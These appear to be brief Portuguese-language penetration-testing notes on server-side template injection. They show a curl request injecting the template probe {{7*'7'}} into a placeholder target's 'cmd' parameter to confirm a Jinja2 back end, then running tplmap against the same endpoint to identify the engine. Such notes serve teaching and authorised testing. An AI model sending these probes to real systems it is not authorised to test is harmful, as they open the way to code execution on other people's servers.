SSTI Exploitation Example 3
curl -gs "http://<TARGET IP>:<PORT>/execute?cmd={{7*'7'}}"
Interagindo com o alvo remoto (confirmando o back-end do Jinja2)
./tplmap.py -u 'http://<TARGET IP>:<PORT>/execute?cmd'
Automatizando o processo de identificação do mecanismo de modelagem com tplmap
python3
Iniciando o interpretador python3
Last updated